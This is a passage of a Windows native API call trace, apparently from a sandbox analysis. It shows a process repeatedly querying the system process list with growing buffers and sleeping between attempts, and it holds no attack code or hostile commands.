ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.701] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.716] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.733] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.751] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.779] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.796] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.812] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.825] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.841] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.856] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.873] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.888] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.919] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.935] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.953] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.965] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.981] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.997] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.013] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 